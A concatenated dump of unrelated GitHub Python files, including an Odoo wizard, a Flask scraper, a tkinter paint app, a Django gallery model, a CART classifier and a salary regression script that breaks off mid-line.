[(4,nature_ids.ids[0])]\n return True\n\n\nclass add_is_destinataire(models.TransientModel):\n _name = 'add.is.destinataire'\n _description = u\"Initialisation Destinataires\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.destinataire']\n add_list = [\n u\"Media\",\n u\"Famille/représentant légal de la (des) personne(s) faisant l’objet de l’IP\",\n u\"Famille/représentant légal d'autre(s) usager(s) concerné(s)\",\n u\"Autorité judiciaire\",\n u\"Cellule de l'enfance\",\n u\"Usager / Patient / Résident\",\n ]\n for data in add_list:\n destinataire_ids = add_data_obj.search([('name', '=', data)])\n if not destinataire_ids:\n add_data_obj.create({'name': data})\n return True\n\n\nclass add_is_qualite(models.TransientModel):\n _name = 'add.is.qualite'\n _description = u\"Initialisation Qualité\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.qualite']\n add_list = [\n \"Usager\",\n \"Famille\",\n \"Autre\",\n ]\n for data in add_list:\n qualite_ids = add_data_obj.search([('name', '=', data)])\n if not qualite_ids:\n add_data_obj.create({'name': data})\n return True\n\n\nclass add_is_qualite_autre(models.TransientModel):\n _name = 'add.is.qualite.autre'\n _description = u\"Initialisation Qualité Autre\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.qualite.autre']\n add_list = [\n \"Usager\",\n \"Famille\",\n \"Professionnel\",\n \"Autre\",\n ]\n for data in add_list:\n qualite_ids = add_data_obj.search([('name', '=', data)])\n if not qualite_ids:\n add_data_obj.create({'name': data})\n return True\n\n\n","repo_name":"tonygalmiche/is_eig12","sub_path":"wizard/company_action.py","file_name":"company_action.py","file_ext":"py","file_size_in_byte":18022,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13311588585","text":"# app.py\nfrom flask import Flask, render_template, request\nfrom scraper import scrape_site\nimport pandas as pd\nfrom html_to_df import *\nfrom cleandata import *\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n data = \"\"\n if request.method == 'POST':\n # Get the values from the form\n subj = request.form.get('text1')\n crse = request.form.get('text2')\n\n path = scrape_site()\n courses = returndf(path)\n \n # Remove rows where all values are spaces\n courses = fix_spacing(courses)\n \n # Fix names of some columns\n courses = courses.rename(columns=clean_columns) \n\n # Only keep columns we actually need (remove unnecessary columns)\n courses = courses[['crn','subj','crse','sect','title','prof','day_beg_end_bldgroom_type', 'hrs', 'avail']]\n \n # convert float types to ints\n convert_floats(courses)\n\n filtered_df = courses[(courses['subj'] == subj) & (courses['crse'] == crse)]\n if filtered_df.empty:\n data = \"
No data found for the provided criteria.
\"\n else:\n data = filtered_df.to_html(classes=\"table table-bordered\", index=False)\n \n return render_template('index.html', data=data)\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Ahmad1786/profbot_scraping","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19840476665","text":"import sys\nif sys.version_info.major == 2:\n import xmlrpclib\n import httplib\nelse:\n import xmlrpc.client as xmlrpclib\n import http.client as httplib\n\nimport socket\nfrom dns import resolver, reversename\nimport time\n\n#COMMANDS\nNOOP=0\nSTOP=1\nDIE=2\nCANCEL=3\nREREGISTER=4\nDEASSIGN=5\n\n#MODES\nRUNNING = 1\nSTOPPING= 2\n\n\n\nclass TimeoutHTTPConnection(httplib.HTTPConnection):\n def __init__(self,host,timeout=70):\n httplib.HTTPConnection.__init__(self, host, timeout = timeout)\n\nclass TimeoutTransport(xmlrpclib.Transport):\n def __init__(self, timeout = 70, *l, **kw):\n xmlrpclib.Transport.__init__(self, *l, **kw)\n self.timeout = timeout\n\n def make_connection(self, host):\n conn = TimeoutHTTPConnection(host, self.timeout)\n return conn\n\nclass TimeoutServerProxy(xmlrpclib.ServerProxy):\n def __init__(self, uri, timeout = 70, *l, **kw):\n kw['transport'] = TimeoutTransport(timeout = timeout, use_datetime = kw.get('use_datetime', 0))\n xmlrpclib.ServerProxy.__init__(self, uri, *l, **kw)\n\n#self register\nport = 38763\naddress = '127.0.0.1'\njob_url = 'http://' + address + ':' + str(port + 1)\n\ncache_hostname = None\ndef get_hostname():\n #get IP address\n global cache_hostname\n if not cache_hostname is None:\n return cache_hostname\n adresses = ['google.com', 'nu.nl', 'tweakers.net']\n while adresses:\n try:\n socket.setdefaulttimeout(30)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); \n s.connect((adresses[0], 0)); \n myip = s.getsockname()[0]\n s.close()\n break\n except:\n adresses = adresses[1:]\n\n\n try:\n addr=reversename.from_address(myip)\n myip = str(resolver.query(addr,\"PTR\")[0])[:-1]\n except Exception as e:\n myip = socket.gethostname().split('.')[0]\n pass\n \n if '-bb' in myip:\n myip = myip.split('-bb')[0]\n if '.' in myip:\n myip = myip.split('.')[0]\n cache_hostname = myip\n \n return myip\n\ndef short_name(name):\n return name.split(\".\")[0].split('-')[0]\n \n","repo_name":"mhulsman/slurm_withinnode_scheduler","sub_path":"xslurm_shared.py","file_name":"xslurm_shared.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"24665524286","text":"# Требуется вычислить, сколько раз встречается некоторое число k в массиве list_1.\n\n# list_1 = [1, 2, 3, 3, 5, 6, 3]\n# k = int(input(\"Введите цифру: \"))\n# count = 0\n# for i in range (0, len(list_1)):\n# if k == list_1[i]:\n# count += 1\n# print(count)\n\n# Требуется найти в массиве list_1 самый близкий по величине элемент к заданному числу k \n# и вывести его.\n\n# list_1 = [5, 6, 1, 2, 4]\n# k = int(input(\"Введите цифру: \"))\n# number = 0\n# min = (k - list_1[0])**2\n# for i in range (len(list_1)):\n# if (k-list_1[i])**2 <= min:\n# min = (k-list_1[i])**2\n# number=i\n# print(list_1[number])\n\n# m = abs(k - list_1[0]) # модуль числа\n# number = list_1[0]\n# for i in range(1, len(list_1)):\n# if m > abs(list_1[i] - k):\n# m = abs(list_1[i] - k)\n# number = list_1[i]\n# print(number)\n\n# В настольной игре Скрабл (Scrabble) каждая буква имеет определенную ценность.\n\n# В случае с английским алфавитом очки распределяются так:\n\n# A, E, I, O, U, L, N, S, T, R – 1 очко;\n# D, G – 2 очка;\n# B, C, M, P – 3 очка;\n# F, H, V, W, Y – 4 очка;\n# K – 5 очков;\n# J, X – 8 очков;\n# Q, Z – 10 очков.\n# А русские буквы оцениваются так:\n\n# А, В, Е, И, Н, О, Р, С, Т – 1 очко;\n# Д, К, Л, М, П, У – 2 очка;\n# Б, Г, Ё, Ь, Я – 3 очка;\n# Й, Ы – 4 очка;\n# Ж, З, Х, Ц, Ч – 5 очков;\n# Ш, Э, Ю – 8 очков;\n# Ф, Щ, Ъ – 10 очков.\n# Напишите программу, которая вычисляет стоимость введенного пользователем слова k \n# и выводит его. Будем считать, что на вход подается только одно слово, которое содержит \n# либо только английские, \n# либо только русские буквы.\n\nlist_English = {1:'AEIOULNSTR', 2:'DG', 3:'BCMP', 4:'FHVWY', 5:\"K\" , 8:'JX', 10:'QZ'}\nlist_ru = {1:'АВЕИНОРСТ', 2:'ДКЛМПУ', 3:'БГЁЬЯ', 4:'ЙЫ', 5:'ЖЗХЦЧ', 8:'ШЭЮ', 10:'ФШЪ'}\nk = input('Введите слово на русском или английском: ')\nlist_word = []\nsumma = 0\n\nfor dict in list_ru:\n for i in k:\n for key, value in list_ru.items():\n if i.upper() in value:\n summa += key\nprint(summa)\n\nfor dict in list_English:\n for i in k:\n for key, value in list_English.items():\n if i.upper() in value:\n summa += key\nprint(summa)\n","repo_name":"leleKKa/HW_python","sub_path":"HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10822383556","text":"from tkinter import *\nfrom tkinter import filedialog,messagebox,colorchooser\nfrom PIL import Image, ImageDraw\nimport PIL\nimport os\nimport datetime\n\n#defining window size\nWIDTH=500\nHEIGHT =500\nBLACK=(0,0,0)\nCENTER = WIDTH//2\n\nclass PaintGUI:\n def __init__(self):\n self.root = Tk()\n self.root.title(\"Paint Clone\") \n\n #brush width\n self.brush_width=15\n self.current_color=\"white\"\n\n\n #setting width, height and color of cnavas\n self.cnv=Canvas(self.root,width=WIDTH-10,height=HEIGHT-10,bg =\"black\")\n self.cnv.pack() #to pack widgets\n self.cnv.bind(\"\", self.paint) #trigger when pressing right click\n\n self.image=PIL.Image.new(\"RGB\",(WIDTH,HEIGHT),BLACK)\n self.draw=ImageDraw.Draw(self.image)\n\n self.btn_frame=Frame(self.root)\n self.btn_frame.pack(fill=X)\n\n self.btn_frame.columnconfigure(0,weight=1)\n self.btn_frame.columnconfigure(1,weight=1)\n self.btn_frame.columnconfigure(2,weight=1)\n\n self.clear_btn=Button(self.btn_frame,text=\"Clear\",command=self.clear)\n self.clear_btn.grid(row=1,column=1, sticky = W+E)\n\n self.save_btn=Button(self.btn_frame,text=\"Save square\",command=self.save_square)\n self.save_btn.grid(row=1,column=2, sticky = W+E)\n\n self.save_btn=Button(self.btn_frame,text=\"Save triangle\",command=self.save_triangle)\n self.save_btn.grid(row=1,column=3, sticky = W+E)\n\n self.save_btn=Button(self.btn_frame,text=\"Save circle\",command=self.save_circle)\n self.save_btn.grid(row=0,column=3, sticky = W+E)\n\n self.save_btn=Button(self.btn_frame,text=\"Save rectangle\",command=self.save_rectangle)\n self.save_btn.grid(row=0,column=4, sticky = W+E)\n \n self.bplus_btn=Button(self.btn_frame,text=\"B+\",command=self.brush_plus) #increase brush size\n self.bplus_btn.grid(row=0,column=1, sticky = W+E)\n\n self.bminus_btn=Button(self.btn_frame,text=\"B-\",command=self.brush_minus)#decrease brush size\n self.bminus_btn.grid(row=0,column=0, sticky = W+E)\n\n # self.color_btn=Button(self.btn_frame,text=\"Change color\",command=self.change_color)\n # self.color_btn.grid(row=0,column=2, sticky = W+E)\n\n self.root.protocol(\"WM_DELETE_WINDOW\",self.close)\n self.root.attributes(\"-topmost\",True)\n self.root.mainloop()\n\n \n def paint(self,event):\n x1,y1=(event.x-1),(event.y-1)\n x2,y2=(event.x+1),(event.y+1)\n self.cnv.create_rectangle(x1,y1,x2,y2,outline=self.current_color,fill=self.current_color,width=self.brush_width)\n self.draw.rectangle([x1,y1,x2+self.brush_width,y2+self.brush_width],outline = self.current_color, fill=self.current_color,width=self.brush_width)\n \n def clear(self): #clearing the screen\n self.cnv.delete(\"all\")\n self.draw.rectangle([0,0,1000,1000],fill=\"black\")\n\n def save_square(self):\n now = datetime.datetime.now()\n filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n default_dir = os.path.expanduser('square')\n # filename = filedialog.asksaveasfilename(\n # initialdir=default_dir,\n # initialfile=filename,\n # defaultextension=\"png\",\n # filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n filename = os.path.join(default_dir, filename)\n self.image.save(filename)\n\n def save_triangle(self):\n now = datetime.datetime.now()\n filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n default_dir = os.path.expanduser('triangle')\n # filename = filedialog.asksaveasfilename(\n # initialdir=default_dir,\n # initialfile=filename,\n # defaultextension=\"png\",\n # filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n filename = os.path.join(default_dir, filename)\n self.image.save(filename)\n\n def save_circle(self):\n now = datetime.datetime.now()\n filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n default_dir = os.path.expanduser('circle')\n # filename = filedialog.asksaveasfilename(\n # initialdir=default_dir,\n # initialfile=filename,\n # defaultextension=\"png\",\n # filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n filename = os.path.join(default_dir, filename)\n self.image.save(filename)\n \n def save_rectangle(self):\n now = datetime.datetime.now()\n filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n default_dir = os.path.expanduser('rectangle')\n # filename = filedialog.asksaveasfilename(\n # initialdir=default_dir,\n # initialfile=filename,\n # defaultextension=\"png\",\n # filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n filename = os.path.join(default_dir, filename)\n self.image.save(filename)\n\n\n def brush_plus(self):\n self.brush_width +=1\n\n def brush_minus(self):\n if self.brush_width>1:\n self.brush_width -=1\n\n # def change_color(self):\n # pass\n def close(self):\n quitorsave=messagebox.askyesnocancel(\"Quit\",\"Do you want to save your work?\",parent=self.root)\n if quitorsave is not None:\n if quitorsave:\n self.save()\n self.root.destroy()\n exit(0)\n\nPaintGUI()","repo_name":"prash00b/paint-app","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15523508333","text":"import logging\nfrom shutil import rmtree\n\nfrom constants import *\nfrom helpers.singleton import Singleton\nfrom managers.bundle_manager import BundleManager, Bundle\nfrom managers.credential_manager import CredentialManager\nfrom managers.data_manager import DataManager\nfrom managers.device_manager import DeviceManager\nfrom managers.device_manager import Drive\n\n\nclass CircuitPythonBundleManager(metaclass=Singleton):\n def __init__(self, settings_path: Path):\n self._selected_bundle = None\n self.on_new_selected_bundle = lambda: None\n self._selected_drive = None\n self.on_new_selected_drive = lambda: None\n self.cred_manager = CredentialManager(SERVICE_NAME, GITHUB_TOKEN_NAME)\n self.bundle_manager = BundleManager(BUNDLES_PATH)\n self.device_manager = DeviceManager(DRIVE_PATH)\n self.data_manager = DataManager(settings_path)\n\n def delete_bundle(self, bundle: Bundle):\n \"\"\"\n Delete a bundle.\n\n :param bundle: A Bundle.\n \"\"\"\n logging.warning(f\"Deleting bundle {bundle}\")\n path = bundle.path\n logging.debug(f\"Path is {path}\")\n rmtree(path)\n\n @property\n def selected_bundle(self) -> Bundle:\n \"\"\"\n Get the currently selected bundle.\n\n :return: A Bundle.\n \"\"\"\n return self._selected_bundle\n\n @selected_bundle.setter\n def selected_bundle(self, new_bundle: Bundle):\n \"\"\"\n Set the currently selected bundle.\n\n :param new_bundle: A Bundle.\n \"\"\"\n self._selected_bundle = new_bundle\n self.on_new_selected_bundle()\n\n @property\n def selected_drive(self) -> Drive:\n \"\"\"\n Get the currently selected bundle.\n\n :return: A Drive.\n \"\"\"\n return self._selected_drive\n\n @selected_drive.setter\n def selected_drive(self, new_drive: Drive):\n \"\"\"\n Set the currently selected bundle.\n\n :param new_drive: A Drive.\n \"\"\"\n self._selected_drive = new_drive\n self.on_new_selected_drive()\n","repo_name":"UnsignedArduino/CircuitPython-Bundle-Manager-v2","sub_path":"circuitpython_bundle_manager.py","file_name":"circuitpython_bundle_manager.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"29858693188","text":"#!/usr/bin/python\n# use like:\n# python replace.py answer.bas 1 14 2.0 0.75\n\n\nimport sys\nimport numpy as np\nimport atomicUtils as au\nimport plotUtils as pu\nimport matplotlib.pyplot as plt\n\natoms = np.genfromtxt ( 'answer.bas', skip_header=1 )\nbonds,bondVecs = au.findAllBonds( atoms, Rcut=3.0, RvdwCut=0.8 )\nneighs = au.neighs( len(atoms), bonds )\n\nselect1 = au.findTypeNeigh( atoms, neighs, 14, neighTyps={1:(2,2)} )\n\nselect2 = au.getAllNeighsOfSelected( select1, neighs, atoms, typs={1} )\nselect2 = list(select2.keys())\n\n#atoms[select1,0] = 16\n#atoms[select2,0] = 9\n#au.saveAtoms( atoms, \"test.xyz\", xyz=True )\n\ngroup = np.array([\n[6, 0.0, 0.0, 0.0 ],\n[1, +0.7,0.7, 0.0 ],\n[1, -0.7,0.7, 0.0 ]\n])\n\ngroup = np.array([\n[15, 0.0, 0.0, 0.0 ],\n[1, 0.0,1.5, 0.0 ],\n])\n\n\n'''\ngroup = np.array([\n[6, 0.0, 0.0, 0.0 ],\n[8, 1.0, 0.0, 0.0 ],\n[9, 0.0, 1.0, 0.0 ],\n[7, 0.0, 0.0, 1.0 ]\n])\n'''\n\npairs = au.findPairs_one( select2, atoms, Rcut=2.5 ); #print( pairs )\n\npairs = au.pairsNotShareNeigh( pairs, neighs ); #print( pairs )\n\ncog = au.findCOG( atoms[:,1:] )\n\natoms_ = au.replacePairs( pairs, atoms, group, up_vec=(cog,1) ); # print( \"atoms_ = \",atoms_ )\nau.saveAtoms( atoms_, \"atoms_.xyz\", xyz=True )\n\n# ---------- ploting\n\n'''\nrotMat = au.makeRotMat( [1.0,1.0,1.0], [0.0,1.0,0.0] )\nps = np.dot( rotMat, np.transpose(atoms[:,1:]) )\n\n\nprint( ps.shape )\n\n#plt.plot( ps[0], ps[1], 'ok' )\n\n#pu.plotAtoms( atoms[:,0], ps[0], ps[1] )\n#pu.plotBonds( [ b[0] for b in bonds], ps[0], ps[1] )\n#pu.plotBonds( pairs, ps[0], ps[1] )\n\nplt.axis('equal')\nplt.show()\n'''\n","repo_name":"ProkopHapala/SimpleSimulationEngine","sub_path":"python/pyMolecular/examples/replace100.py","file_name":"replace100.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"91"}
+{"seq_id":"72806392622","text":"from .models import Link\r\n\r\ndef diccionario_contexto(request): # Creamos esta función para extender las funcionalidades del diccionario de contexto.\r\n ctx = {} # ctx stands for contexto. Creamos el diccionario de contexto vacío.\r\n links = Link.objects.all()\r\n for link in links:\r\n ctx[link.key] = link.url # Hemos generado un diccionario con las redes sociales para cada key. Es decir, {\"LINK_FACEBOOK\": \"www.facebook.com\", ...}\r\n return ctx\r\n\r\n# Al agregar el este script directamente a settings.py (más específicamente a \"context_processors\"), \r\n# podremos acceder desde cualquier template de cualquier aplicación a este diccionario.","repo_name":"DanielRosasPerez/Web_empresa","sub_path":"social/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9846448779","text":"#!/usr/bin/env python3\nimport itertools\nimport logging\nimport numpy as np\nimport log_setup\n\nclass TreeNode(object):\n def __init__(self, feat_name, feat_idx, feat_val, samp_cnt, left=None, right=None):\n self._feat_name = feat_name\n self._feat_idx = feat_idx\n self._feat_val = feat_val\n self._samp_cnt = samp_cnt\n\n self._left = left\n self._right = right\n\n def to_string(self):\n return [\n 'feat_name:{}, feat_idx:{}, feat_val:{}, samp_cnt:{}'.format(\n self._feat_name,\n self._feat_idx, self._feat_val, self._samp_cnt),\n self._left.to_string(),\n self._right.to_string(),\n ]\n\n\nclass LeafNode(object):\n def __init__(self, value, response_values, left=None, right=None):\n self._value = value\n self._samp_cnt = len(response_values)\n self._uniq, self._cnts = np.unique(response_values, return_counts=True)\n self._left = left\n self._right = right\n\n def to_string(self):\n return ['value:{}, samp_cnt:{}, uniq:{}, cnts:{}'.format(self._value, self._samp_cnt, self._uniq, self._cnts)]\n\n\nclass CartClassification(object):\n def __init__(self):\n self._min_split_info_gain = 1e-6\n self._min_split_size = 3\n\n def train(self, names, samples, cate_feats):\n self._feat_names = names\n self._samples = samples\n # key: feature's column index in samples\n # value: string value to numeric value\n self._cate_feats = cate_feats\n self._cart_tree = self._recursive_tree(np.arange(len(self._samples)))\n\n def _binary_split(self, samples, indices, feat_idx, feat_val):\n if feat_idx not in self._cate_feats:\n # numerical feature, feat_val is a float\n pos = samples[indices, feat_idx] <= feat_val\n else:\n # categorical feature, feat_val is a list\n pos = np.isin(samples[indices, feat_idx], feat_val)\n l_indices = indices[pos]\n r_indices = indices[np.logical_not(pos)]\n return l_indices, r_indices\n\n def _shannon_entropy(self, unique, counts):\n prob = 1.0 * counts / np.sum(counts)\n return np.sum(- prob * np.log2(prob))\n\n def _calculate_split_entropy(self, samples, l_indices, r_indices):\n l_entropy = self._shannon_entropy(*np.unique(samples[l_indices,-1], return_counts=True))\n r_entropy = self._shannon_entropy(*np.unique(samples[r_indices,-1], return_counts=True))\n l_count, r_count = len(l_indices), len(r_indices)\n return 1.0 * (l_entropy * l_count + r_entropy * r_count) / (l_count + r_count)\n\n\n def _find_best_split(self, indices):\n unique, counts = np.unique(self._samples[indices, -1], return_counts=True)\n if len(unique) == 1:\n return None, unique[0]\n if len(indices) < self._min_split_size: # most frequent\n return None, unique[np.argmax(counts)]\n\n base_entropy = self._shannon_entropy(unique, counts)\n\n best_feat_idx = -1\n best_split_val = None # either numerical, or a list\n best_info_gain = 0.0\n sz = len(indices)\n for feat_idx in range(self._samples.shape[1] - 1):\n if feat_idx not in self._cate_feats:\n # numerical feature\n for split_value in np.unique(self._samples[indices, feat_idx]):\n l_indices, r_indices = self._binary_split(self._samples, indices, feat_idx, split_value)\n info_gain = base_entropy - self._calculate_split_entropy(self._samples, l_indices, r_indices)\n if info_gain > best_info_gain:\n #logging.info('{} feat #{} {} using {}: ig {:.6f} -> {:.6f}'.format(sz,\n # feat_idx, self._feat_names[feat_idx], split_value,\n # best_info_gain, info_gain))\n best_feat_idx = feat_idx\n best_split_val = split_value\n best_info_gain = info_gain\n continue\n\n # categorical feature\n cate_values = list(self._cate_feats[feat_idx].values())\n\n for a_cate in cate_values: # one-vs-(n-1)\n l_indices, r_indices = self._binary_split(self._samples, indices, feat_idx, [a_cate])\n if len(l_indices) == 0 or len(r_indices) == 0:\n continue\n info_gain = base_entropy - self._calculate_split_entropy(self._samples, l_indices, r_indices)\n if info_gain > best_info_gain:\n #logging.info('{} feat #{} {} using {}: ig {:.6f} -> {:.6f}'.format(sz,\n # feat_idx, self._feat_names[feat_idx], [a_cate],\n # best_info_gain, info_gain))\n best_feat_idx = feat_idx\n best_split_val = [a_cate] # list\n best_info_gain = info_gain\n\n if len(cate_values) > 5:\n continue\n\n for l in range(2, len(cate_values) // 2 + 1): # 1-4, 2-3, unnecessary 3-2 & 4-1\n for comb in itertools.combinations(cate_values, l):\n comb = list(comb)\n #logging.info('checking feat_idx {} comb {}'.format(feat_idx, comb))\n l_indices, r_indices = self._binary_split(self._samples, indices, feat_idx, comb)\n if len(l_indices) == 0 or len(r_indices) == 0:\n continue\n info_gain = base_entropy - self._calculate_split_entropy(self._samples, l_indices, r_indices)\n if info_gain > best_info_gain:\n #logging.info('{} feat #{} {} using {}: ig {:.6f} -> {:.6f}'.format(sz,\n # feat_idx, self._feat_names[feat_idx], comb,\n # best_info_gain, info_gain))\n best_feat_idx = feat_idx\n best_split_val = comb\n best_info_gain = info_gain\n\n if best_feat_idx < 0 or best_info_gain < self._min_split_info_gain:\n return None, unique[np.argmax(counts)] # most frequent\n else:\n return best_feat_idx, best_split_val\n\n def _recursive_tree(self, indices):\n feat, value = self._find_best_split(indices)\n if feat is None:\n return LeafNode(value, self._samples[indices,-1]) # value is model's response\n\n print('split at feat {} {} using {}'.format(feat, self._feat_names[feat], value))\n l_indices, r_indices = self._binary_split(self._samples,\n indices, feat, value)\n result = TreeNode(\n self._feat_names[feat],\n feat, value, len(indices),\n left=self._recursive_tree(l_indices),\n right=self._recursive_tree(r_indices))\n result._left._parent = result\n result._right._parent = result\n return result\n\nif __name__ == '__main__':\n import ds_heart\n import pprint\n log_setup.setup()\n feat_names, samples, idx2map = ds_heart.load_dataset()\n cart_classification = CartClassification()\n cart_classification.train(feat_names, samples, idx2map)\n pprint.pprint(cart_classification._cart_tree.to_string(), indent=4, width=100)\n","repo_name":"brianlions/ML-DNN-algo-crafting","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15864159174","text":"from django.db import models\nfrom django.conf import settings\n\nclass Gallery(models.Model):\n def to_client(self):\n image_set = Image.objects.filter(gallery=self)\n images_json = [image.to_client() for image in image_set]\n \n return {\n 'id': self.id,\n 'images': images_json\n }\n\nclass Image(models.Model):\n file = models.FileField(upload_to='documents/')\n\n gallery = models.ForeignKey(\n Gallery, \n on_delete=models.CASCADE, \n blank=True, \n null=True,\n related_name='images'\n )\n\n def to_client(self):\n votes = self.vote_set.all().count()\n return {\n 'url': self.file.url,\n 'id': self.id,\n 'votes': votes\n }\n\nclass Vote(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n gallery = models.ForeignKey(Gallery, on_delete=models.CASCADE)\n image = models.ForeignKey(Image, on_delete=models.CASCADE, default=None)\n\n class Meta:\n unique_together = ('user', 'gallery')\n\n def to_client(self):\n return {\n 'gallery': self.gallery.id,\n 'image': self.image.id,\n 'user': self.user.id\n }","repo_name":"natotthomer/galleries","sub_path":"galleries/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29205009736","text":"# The program bellow allows the player to guess the\n# the number as many time as he/she wants.\n#\n# The program should let the player know whether to\n# guess higher or lower, and should print a message\n# when the guess is correct. A correct guess will\n# terminate the program.\n#\n# As an optional extra, allow the player to quit by entering\n# 0 (zero) for their guess.\n\nimport random\n\n\nhighest = 1000\nanswer = random.randint(1, highest)\n\nuser_input = int(input(\"Please enter a number between 1 and {0}: \".format(highest)))\nnumberOfGuesses = 0\nwhile user_input != answer:\n if user_input == 0:\n print(\"You aborted the Game\")\n break\n if user_input > answer:\n user_input = int(input(\"Please enter lower number: \"))\n else:\n user_input = int(input(\"Please enter higher number: \"))\n numberOfGuesses += 1\nelse:\n print(\"Congratulation, you spot the correct answer after {0} guess(es).\".format(numberOfGuesses))\n","repo_name":"SMHosseinM/Python","sub_path":"Challenge3/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42716769287","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 28 21:43:59 2021\n\n@author: Andrew\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.neighbors import KNeighborsClassifier\nimport joblib\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV\nfrom sklearn.naive_bayes import GaussianNB\nfrom xgboost import XGBRegressor\n\n\ncwd = os.getcwd()\n\n\nfilepath = \"C:/Users/Andrew/Desktop/EdX/Self Projects/Classification/Data_entry/test\"\nos.chdir(filepath)\n\n#### Salary Estimate Regression Models\n\n### Step 1. Read the CSV file and factorize by job type\ndf = pd.read_csv(\"df_cleaned_new.csv\")\nfactor = pd.factorize(df['Job_Code'])\ndf['Job_Code'] = factor[0]\n\n### Step 2. Selecting meaningful dataset (columns)\ndf_sal =df[['avg_salary','Job_Code','python','masters', 'statistic', 'SQL', 'spark', 'AWS', 'Tableau', \n 'Hadoop', 'C_lang', 'Java', 'app', 'debug', 'HTML', 'object']]\n\n### Step 3. Define dependent and independent variables\nX_sal = df_sal.drop('avg_salary',axis=1)\ny_sal = df_sal[['avg_salary']].values\n\n### Step 4. Split train, test sets\nX_sal_train, X_sal_test, y_sal_train, y_sal_test = train_test_split(X_sal, y_sal, test_size=0.2, random_state=42)\n\n### Step 5. Try different modeling techniques for salary estimate regressor\nrf = RandomForestRegressor(n_estimators=80, criterion='mae', max_features='sqrt')\nrf.fit(X_sal_train,y_sal_train)\nrf.score(X_sal_train, np.ravel(y_sal_train))\nrf.score(X_sal_test, np.ravel(y_sal_test))\nmean_absolute_error(y_sal_test, rf.predict(X_sal_test))\n\nlm = linear_model.LinearRegression()\nlm.fit(X_sal_train,y_sal_train)\nlm.score(X_sal_train, np.ravel(y_sal_train))\nlm.score(X_sal_test, np.ravel(y_sal_test))\nmean_absolute_error(y_sal_test, lm.predict(X_sal_test))\n\nxgb = XGBRegressor(verbosity = 0)\nxgb.fit(X_sal_train,y_sal_train)\nxgb.score(X_sal_train, np.ravel(y_sal_train))\nxgb.score(X_sal_test, np.ravel(y_sal_test))\nmean_absolute_error(y_sal_test, xgb.predict(X_sal_test))\n\ncv_score = cross_val_score(xgb, X_sal_train,y_sal_train, cv=10)\n\n## Try tuning the hyperparameters in random forest regressor - this gives the lowest MAE\nn_estimators = [int(x) for x in np.linspace(start = 10, stop = 80, num = 10)]\nmax_features = ['auto','sqrt']\nmax_depth = [2,4]\nmin_samples_split = [2,5]\nmin_samples_leaf = [1,2]\nbootstrap = [True, False]\n\nparam_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n\n\nrf_Grid = GridSearchCV(estimator = rf, param_grid = param_grid, cv=3, verbose=2, n_jobs=4)\nrf_Grid.fit(X_sal_train, y_sal_train)\nrf_Grid.score(X_sal_train, y_sal_train)\nrf_Grid.score(X_sal_test,y_sal_test)\nmean_absolute_error(y_sal_test, rf_Grid.predict(X_sal_test))\n\n### Step 6. Results\n'''\nThe first approach, RandomForestRegressor with hyperparameter tuning gave the best results.\nA possible explanation to the low performance of the regressor is the nature of the salary data.\nSince the dataset was extracted from glassdoor website where the salary data are provided as a range,\nmany salary data may have been affected by the location (state), rather than the job skills described in\nthe job description. This may have caused weak correlation between the listed 